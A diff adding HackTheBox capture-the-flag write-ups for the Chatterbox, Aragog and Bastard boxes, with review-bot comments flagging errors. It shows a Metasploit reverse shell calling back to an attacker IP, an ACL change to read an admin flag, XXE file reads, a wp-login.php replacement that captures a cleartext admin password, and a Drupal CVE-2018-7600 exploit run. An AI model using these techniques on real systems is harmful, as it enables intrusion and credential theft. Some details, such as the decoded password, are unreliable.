+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>systeminfo
+ systeminfo
+
+
+
+Looking at the systeminfo we see that the box has quite alot of hotfixes installed, so the privilege escalation may not be as trivial as we think :
+
+
+ Host Name: CHATTERBOX
+ OS Name: Microsoft Windows 7 Professional
+ OS Version: 6.1.7601 Service Pack 1 Build 7601
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Workstation
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00371-223-0897461-86794
+ Original Install Date: 12/10/2017, 9:18:19 AM
+ System Boot Time: 3/12/2020, 5:52:17 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: X86-based PC
+ Processor(s): 2 Processor(s) Installed.
+ [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-05:00) Eastern Time (US & Canada)
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,402 MB
+ Virtual Memory: Max Size: 4,095 MB
+ Virtual Memory: Available: 3,423 MB
+ Virtual Memory: In Use: 672 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: \\CHATTERBOX
+ Hotfix(s): 208 Hotfix(s) Installed.
+ [01]: KB2849697
+ [02]: KB2849696
+ [03]: KB2841134
+ [04]: KB2670838
+ [05]: KB2830477
+ [06]: KB2592687
+ [07]: KB2479943
+ [08]: KB2491683
+ [09]: KB2506212
+ [10]: KB2506928
+ [11]: KB2509553
+ [12]: KB2532531
+ [13]: KB2533552
+ [14]: KB2533623
+
+ [...]
+
+ [206]: KB976902
+ [207]: KB982018
+ [208]: KB4054518
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.74
+
+
+now let's first upgrade our multi handler to a meterpreter shell :
+
+
+ C:\Windows\system32>^Z
+ Background session 1? [y/N] y
+ msf5 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
+ msf5 post(multi/manage/shell_to_meterpreter) > set session 1
+ session => 1
+ msf5 post(multi/manage/shell_to_meterpreter) > set lhost 10.10.14.11
+ lhost => 10.10.14.11
+ msf5 post(multi/manage/shell_to_meterpreter) > set lport 8888
+ lport => 8888
+ msf5 post(multi/manage/shell_to_meterpreter) > exploit
+
+ [*] Upgrading session ID: 1
+ [*] Starting exploit/multi/handler
+ [*] Started reverse TCP handler on 10.10.14.11:8888
+
+
+Wait a bit for it to migrate :
+
+
+ [*] Started reverse TCP handler on 10.10.14.11:8888
+ [*] Post module execution completed
+ msf5 post(multi/manage/shell_to_meterpreter) >
+ [*] Sending stage (180291 bytes) to 10.10.10.74
+ [*] Meterpreter session 2 opened (10.10.14.11:8888 -> 10.10.10.74:49158) at 2020-03-12 09:55:49 +0000
+ [*] Stopping exploit/multi/handler
+
+
+
+And we see that it opened session 2 for us, so migrate into our second session :
+
+
+ msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
+ [*] Starting interaction with 2...
+
+ meterpreter > shell
+ Process 4008 created.
+ Channel 1 created.
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ chatterbox\alfred
+
+
+Looks like we are logged in as alfred, so let's go ahead and print out his user.txt flag :
+
+
+ C:\Windows\system32>cd ..
+ cdcd ..
+
+ C:\Windows> ..
+ cd ..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\
+
+ 06/10/2009 05:42 PM 24 autoexec.bat
+ 06/10/2009 05:42 PM 10 config.sys
+ 07/13/2009 10:37 PM <****DIR> PerfLogs
+ 12/10/2017 02:35 PM <****DIR> Program Files
+ 12/10/2017 10:21 AM <****DIR> Users
+ 12/10/2017 07:42 PM <****DIR> Windows
+ 2 File(s) 34 bytes
+ 4 Dir(s) 17,930,084,352 bytes free
+
+ C:\>cd Users
+ cd Users
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users
+
+ 12/10/2017 10:21 AM <****DIR> .
+ 12/10/2017 10:21 AM <****DIR> ..
+ 12/10/2017 02:34 PM <****DIR> Administrator
+ 12/10/2017 10:18 AM <****DIR> Alfred
+ 04/11/2011 10:21 PM <****DIR> Public
+ 0 File(s) 0 bytes
+ 5 Dir(s) 17,930,084,352 bytes free
+
+ C:\Users>cd Alfred
+ cd Alfred
+
+ C:\Users\Alfred>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Alfred
+
+ 12/10/2017 10:18 AM <****DIR> .
+ 12/10/2017 10:18 AM <****DIR> ..
+ 12/10/2017 01:05 PM <****DIR> Contacts
+ 12/10/2017 07:50 PM <****DIR> Desktop
+ 12/10/2017 01:05 PM <****DIR> Documents
+ 12/10/2017 01:25 PM <****DIR> Downloads
+ 12/10/2017 01:05 PM <****DIR> Favorites
+ 12/10/2017 01:05 PM <****DIR> Links
+ 12/10/2017 01:05 PM <****DIR> Music
+ 12/10/2017 01:05 PM <****DIR> Pictures
+ 12/10/2017 01:05 PM <****DIR> Saved Games
+ 12/10/2017 01:05 PM <****DIR> Searches
+ 12/10/2017 01:05 PM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 17,930,084,352 bytes free
+
+ C:\Users\Alfred>cd Desktop
+ cd Desktop
+
+ C:\Users\Alfred\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Alfred\Desktop
+
+ 12/10/2017 07:50 PM <****DIR> .
+ 12/10/2017 07:50 PM <****DIR> ..
+ 12/10/2017 07:50 PM 32 user.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 17,930,084,352 bytes free
+
+ C:\Users\Alfred\Desktop>type user.txt
+ type user.txt
+ 72XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Getting the Administrator flag is preety straightforward since we can already navigate into the Administrator folder:
+
+
+ C:\Users\Alfred\Desktop>cd ../..
+ cd ../..
+
+ C:\Users>cd Administrator
+ cd Administrator
+
+ C:\Users\Administrator>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Administrator
+
+ 12/10/2017 02:34 PM <****DIR> .
+ 12/10/2017 02:34 PM <****DIR> ..
+ 12/10/2017 07:08 PM <****DIR> Contacts
+ 12/10/2017 07:50 PM <****DIR> Desktop
+ 12/10/2017 07:08 PM <****DIR> Documents
+ 12/10/2017 07:08 PM <****DIR> Downloads
+ 12/10/2017 07:08 PM <****DIR> Favorites
+ 12/10/2017 07:08 PM <****DIR> Links
+ 12/10/2017 07:08 PM <****DIR> Music
+ 12/10/2017 07:08 PM <****DIR> Pictures
+ 12/10/2017 07:08 PM <****DIR> Saved Games
+ 12/10/2017 07:08 PM <****DIR> Searches
+ 12/10/2017 07:08 PM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 18,025,164,800 bytes free
+
+ C:\Users\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Users\Administrator\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Administrator\Desktop
+
+ 12/10/2017 07:50 PM <****DIR> .
+ 12/10/2017 07:50 PM <****DIR> ..
+ 12/10/2017 07:50 PM 32 root.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 18,025,164,800 bytes free
+
+ C:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ Access is denied.
+
+As expected we can't print out the Administrator's root flag. so we check the permissions since it is quite odd to be able to navigate into his folder as the user alfred:
+
+
+ C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
+ cacls C:\Users\Administrator\Desktop
+ C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+ CHATTERBOX\Administrator:(OI)(CI)(ID)F
+ BUILTIN\Administrators:(OI)(CI)(ID)F
+ CHATTERBOX\Alfred:(OI)(CI)(ID)F
+
+
+
+Basically here we see that we already have the privileges we need to modify the permissions of all files and directories under Admin's directory. And since we are on a Windows 7 Box there is a command line tool to change file permissions :
+
+
+ C:\Users\Administrator\Desktop>ICACLS root.txt /grant "Users":F
+ ICACLS root.txt /grant "Users":F
+ processed file: root.txt
+ Successfully processed 1 files; Failed processing 0 files
+
+ C:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ a6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And as you can see we have been able to print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
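Review bot: the explanation under the msfvenom command contradicts the command itself. The text says the payload "will connect back to our ip (10.10.14.11) on port 9001 spawning the calc.exe application", but the command shown is `-p windows/shell/reverse_tcp_allports LPORT=4444 LHOST=10.10.14.11`; calc.exe belongs to the original `windows/exec CMD=calc.exe` comment grepped out of 36025.py and 9001 appears nowhere in this file, so rewrite that sentence around the reverse shell on 4444. Same family of slip: "we set up a meterpreter handler" describes a plain `windows/shell/reverse_tcp_allports` command shell (meterpreter only arrives later via `shell_to_meterpreter`), and the intro promises `-sC`/`-sV` while the first four scans are `-F`/`--top-ports`/`-Pn` probes (`-F` and `--top-ports` also conflict, and nmap scanned 8320 ports rather than 30000). In Part 3 the real finding is in the `cacls` output, `CHATTERBOX\Alfred:(OI)(CI)(ID)F`: the `(ID)` marks it as inherited from `C:\Users\Administrator`, so the misconfiguration to call out is Alfred's full control on the Administrator profile directory, not the ACL on root.txt itself, and the `ICACLS root.txt /grant "Users":F` step should be flagged as a persistent change to the target's ACLs. Cosmetic: `<****DIR>` in every `dir` listing is conversion residue for `<DIR>`; the stray backticks sit where two images used to be; "alot" should be "a lot", "arguement" should be "argument", "preety" should be "pretty".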
diff --git a/Medium/19.md b/Medium/19.md
new file mode 100644
index 0000000..32a665d
--- /dev/null
+++ b/Medium/19.md
@@ -0,0 +1,326 @@
+# Aragog Writeup
+
+
+
+## Introduction :
+
+Aragog is a Medium linux box released back in Febuary 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~]
+ → nmap -F 10.10.10.78 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 13:09 GMT
+ Nmap scan report for 10.10.10.78
+ Host is up (0.092s latency).
+ Not shown: 8317 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 54.94 seconds
+
+ λ nihilist [ 10.10.14.6/23 ] [~]
+ → nmap -sCV -p21,22,80 10.10.10.78
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 13:10 GMT
+ Nmap scan report for 10.10.10.78
+ Host is up (0.090s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to ::ffff:10.10.14.6
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | At session startup, client count was 1
+ | vsFTPd 3.0.3 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
+ | 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
+ |_ 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.37 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 running vsftpd 3.0.3 with anonymous login so let's investigate it:
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~]
+ → ftp 10.10.10.78
+ Connected to 10.10.10.78.
+ 220 (vsFTPd 3.0.3)
+ Name (10.10.10.78:nihilist): anonymous
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ -r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
+ 226 Directory send OK.
+ ftp> get test.txt
+ local: test.txt remote: test.txt
+ 200 PORT command successful. Consider using PASV.
+ 150 Opening BINARY mode data connection for test.txt (86 bytes).
+ 226 Transfer complete.
+ 86 bytes received in 0.00 secs (52.6218 kB/s)
+ ftp> exit
+ 221 Goodbye.
+
+
+
+Now that we have downloaded the only textfile allowed to us we print out it's contents :
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → cat test.txt
+ <****details> <****subnet_mask>255.255.255.192 <****/subnet_mask> <****test> <****/test> <****/details>
+
+Looks like we are hinted towards a particular subnet whose mask is /26 so let's move over to enumerating port 80 And for that matter we will be using dirb:
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → dirb http://10.10.10.78/ -X .php
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Fri Mar 13 13:36:52 2020
+ URL_BASE: http://10.10.10.78/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.78/ ----
+ + http://10.10.10.78/hosts.php (CODE:200|SIZE:46)
+
+ -----------------
+ END_TIME: Fri Mar 13 13:44:07 2020
+ DOWNLOADED: 4612 - FOUND: 1
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → curl -sk http://10.10.10.78/hosts.php
+
+ There are 4294967294 possible hosts for
+
+
+Looking at the results, we seem to have found yet another thing related to subnetting just like that test.txt file we found. so let's catch the request with burpsuite's interceptor and see what we can do from there.
+
+
+
+From there we send the request over to the repeater so that we can modify it to contain the contents of the test.txt file we found on the ftp service earlier.
+
+From there, we change the "GET" method to a "POST" method and add test.txt's file contents :
+
+
+
+And we get a successful response! it looks like this is a subnet calculator, now since we have xml-like content we could assume that we can get some XXE. Let's verify that by sending in an infected payload to read /etc/passwd:
+
+
+
+And we seem to have an username to work with: , so let's try to print out his user flag.
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we have the user flag let's try to get to access onto the system, To do so we'll first try to get the user florian's private ssh key, that is stored in /home/florian/.ssh/id_rsa
+
+
+
+And we have it ! now let's save it locally, give it the necessary permissions and use it to login as the user florian :
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → ssh -i id_rsa florian@10.10.10.78
+ The authenticity of host '10.10.10.78 (10.10.10.78)' can't be established.
+ ECDSA key fingerprint is SHA256:phu0FjQg/9nCmL2014AJ9yH4akvraA7Ea5QtE59wqD4.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.78' (ECDSA) to the list of known hosts.
+ Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3
+
+ florian@aragog:~$ id
+ uid=1000(florian) gid=1000(florian) groups=1000(florian)
+
+ florian@aragog:~$
+
+
+Now since we know that this box has a server running let's see what'sin /var/www/html :
+
+
+ florian@aragog:~$ cd /var/www/html
+ florian@aragog:/var/www/html$ ls
+ dev_wiki hosts.php index.html zz_backup
+ florian@aragog:/var/www/html$ cat hosts.php
+ <****?php
+
+ libxml_disable_entity_loader (false);
+ $xmlfile = file_get_contents('php://input');
+ $dom = new DOMDocument();
+ $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
+ $details = simplexml_import_dom($dom);
+ $mask = $details->subnet_mask;
+ //echo "\r\nYou have provided subnet $mask\r\n";
+
+ $max_bits = '32';
+ $cidr = mask2cidr($mask);
+ $bits = $max_bits - $cidr;
+ $hosts = pow(2,$bits);
+ echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";
+
+ function mask2cidr($mask){
+ $long = ip2long($mask);
+ $base = ip2long('255.255.255.255');
+ return 32-log(($long ^ $base)+1,2);
+ }
+
+ ?****>
+
+Here is the php file we exploited earlier, but in order to escalate privileges we need to take a look into dev_wiki
+
+
+ florian@aragog:/var/www/html$ cd dev_wiki
+ florian@aragog:/var/www/html/dev_wiki$ ls
+ index.php wp-blog-header.php wp-includes wp-settings.php
+ license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
+ readme.html wp-config.php wp-load.php wp-trackback.php
+ wp-activate.php wp-content wp-login.php xmlrpc.php
+ wp-admin wp-cron.php wp-mail.php
+
+
+Now let's see if we can access that wordpress website from the web browser :
+
+
+
+We get a 403 forbidden, but seeing that 10.10.10.78 got changed into aragog, we add the correct line in our /etc/hosts to be able to access the website :
+
+
+
+We see the wordpress website as expected, now let's see what's in the blog directory :
+
+
+
+Apparently the wordpress website files are regularly wiped out, and replaced back automatically, So let's replace wp-login.php with the custom php script that [Magnetik Online](https://github.com/magnetikonline) made:
+
+
+ <****?php
+ // https://gist.github.com/magnetikonline/650e30e485c0f91f2f40
+
+ class DumpHTTPRequestToFile {
+
+ public function execute($targetFile) {
+
+ $data = sprintf(
+ "%s %s %s\n\nHTTP headers:\n",
+ $_SERVER['REQUEST_METHOD'],
+ $_SERVER['REQUEST_URI'],
+ $_SERVER['SERVER_PROTOCOL']
+ );
+
+ foreach ($this->getHeaderList() as $name => $value) {
+ $data .= $name . ': ' . $value . "\n";
+ }
+
+ $data .= "\nRequest body:\n";
+
+ file_put_contents(
+ $targetFile,
+ $data . file_get_contents('php://input') . "\n"
+ );
+
+ echo("Done!\n\n");
+ }
+
+ private function getHeaderList() {
+
+ $headerList = [];
+ foreach ($_SERVER as $name => $value) {
+ if (preg_match('/^HTTP_/',$name)) {
+ // convert HTTP_HEADER_NAME to Header-Name
+ $name = strtr(substr($name,5),'_',' ');
+ $name = ucwords(strtolower($name));
+ $name = strtr($name,' ','-');
+
+ // add to list
+ $headerList[$name] = $value;
+ }
+ }
+
+ return $headerList;
+ }
+ }
+
+
+ (new DumpHTTPRequestToFile)->execute('./dumprequest.txt');
+
+
+ florian@aragog:/var/www/html/dev_wiki$ rm -rf wp-login.php
+ florian@aragog:/var/www/html/dev_wiki$ nano wp-login.php
+
+
+Then wait a bit for the dumprequest.txt file to appear then print out it's contents :
+
+
+ florian@aragog:/var/www/html/dev_wiki$ cat dumprequest.txt
+ POST /dev_wiki/wp-login.php HTTP/1.1
+
+ HTTP headers:
+ Host: 127.0.0.1
+ Connection: keep-alive
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ User-Agent: python-requests/2.18.4
+ Cookie: wordpress_test_cookie=WP Cookie check
+
+ Request body:
+ pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit;=Log+In&testcookie;=1&log;=Administrator&redirect;_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F
+
+
+Now the interesting part here is " %21KRgYs%28JFO%21%26MTr%29lf " which is an URL encoded string that we can paste into burpsuite to decode to get the following string : !KRgYs(JFO!&MTr;)lf
+
+
+ florian@aragog:/var/www/html/dev_wiki$ su
+ Password:
+ shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
+ sh: 0: getcwd() failed: No such file or directory
+
+ root@aragog:/var/www/html/dev_wiki# cat /root/root.txt
+ 9aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
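Review bot: the decoded password quoted in the prose, `!KRgYs(JFO!&MTr;)lf`, does not match the URL-encoded value it was decoded from: `%21KRgYs%28JFO%21%26MTr%29lf` decodes to `!KRgYs(JFO!&MTr)lf` with no semicolon. The same entity-escaping artefact has inserted a `;` into `&wp-submit;=`, `&testcookie;=`, `&log;=` and `&redirect;_to=` in the dumped request body, so either show the captured body verbatim or strip the stray semicolons in both places. Smaller points: the PHP listing opens with `<****?php` instead of `<?php`, "print out it's contents" should be "its contents", and the Conclusion heading promises a progress graph but no image follows it.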
diff --git a/Medium/2.md b/Medium/2.md
new file mode 100644
index 0000000..de587b4
--- /dev/null
+++ b/Medium/2.md
@@ -0,0 +1,266 @@
+# Bastard Writeup
+
+
+
+## Introduction :
+
+Bastard is a Windows box released back in march 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nmap -F 10.10.10.9
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 14:15 GMT
+ Nmap scan report for 10.10.10.9
+ Host is up (0.11s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 49154/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.50 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nmap -sCV -p80,135,49154 10.10.10.9
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 14:15 GMT
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 7.5
+ |_http-generator: Drupal 7 (http://drupal.org)
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ | http-robots.txt: 36 disallowed entries (15 shown)
+ | /includes/ /misc/ /modules/ /profiles/ /scripts/
+ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
+ | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
+ |_/LICENSE.txt /MAINTAINERS.txt
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: Welcome to 10.10.10.9 | 10.10.10.9
+ 135/tcp open msrpc Microsoft Windows RPC
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Looks like our nmap scan picked up a drupal 7 service running on port 80, let's run a quick searchsploit command to see the public exploits we could use :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → searchsploit drupal 7.
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | exploits/php/webapps/44355.php
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | exploits/php/webapps/34984.py
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | exploits/php/webapps/34993.php
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | exploits/php/webapps/35150.php
+ Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
+ Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
+ Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
+ Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
+ Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | exploits/php/webapps/44557.rb
+ Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | exploits/php/webapps/44542.txt
+ Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Ex | exploits/php/webapps/44449.rb
+ Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site | exploits/php/webapps/25493.txt
+ Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
+ Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | exploits/php/webapps/35397.txt
+ Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | exploits/php/remote/40130.rb
+ Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
+ ----------------------------------------------------------------------------- -------------------------------
+
+
+copying 41564.php locally, we examine it and see that it wants us to browse to the /rest_endpoint.
+
+
+
+But we need to correct this url to /rest in order to get the desired effect :
+
+
+
+After much trial and error, many of the aforementionned php scripts were outdated and unusable, so i switched over to a python script instead :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → python3 2018-7600.py http://10.10.10.9/ -c "whoami"
+
+ =============================================================================
+ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
+ | by pimps |
+ =============================================================================
+
+ [*] Poisoning a form and including it in cache.
+ [*] Poisoned form ID: form-F2PmgwKau-sei4wLBRAsbitLPDkYqeRHaKxEw4WeQNo
+ [*] Triggering exploit to execute: whoami
+ nt authority\iusr
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → python3 2018-7600.py http://10.10.10.9/ -c "type C:\Users\dimitris\desktop\user.txt"
+
+ =============================================================================
+ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
+ | by pimps |
+ =============================================================================
+
+ [*] Poisoning a form and including it in cache.
+ [*] Poisoned form ID: form-u8rZwB5AUBU3RSzFAvz5PX_RUlfC7iWMA0Om2-K_gXM
+ [*] Triggering exploit to execute: type C:\Users\dimitris\desktop\user.txt
+ baXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have the user flag
+
+## **Part 3 : Getting Root Access**
+
+In order to read the root flag of this machine , we first need to somehow access the machine, first let's run the systeminfo command :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → python3 2018-7600.py http://10.10.10.9/ -c "systeminfo"
+
+ =============================================================================
+ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
+ | by pimps |
+ =============================================================================
+
+ [*] Poisoning a form and including it in cache.
+ [*] Poisoned form ID: form-l-goUGhqwcUeRLLycex1-gKPluVKCYJEfkgbWBW7XXU
+ [*] Triggering exploit to execute: systeminfo
+
+ Host Name: BASTARD
+ OS Name: Microsoft Windows Server 2008 R2 Datacenter
+ OS Version: 6.1.7600 N/A Build 7600
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00496-001-0001283-84782
+ Original Install Date: 18/3/2017, 7:04:46 ��
+ System Boot Time: 20/2/2020, 4:02:55 ��
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 2 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: el;Greek
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
+ Total Physical Memory: 2.047 MB
+ Available Physical Memory: 1.494 MB
+ Virtual Memory: Max Size: 4.095 MB
+ Virtual Memory: Available: 3.492 MB
+ Virtual Memory: In Use: 603 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: HTB
+ Logon Server: N/A
+ Hotfix(s): N/A
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.9
+
+
+So here are a few more details of the box , let's try a php exploit that our searchsploit command found earlier :
+
+
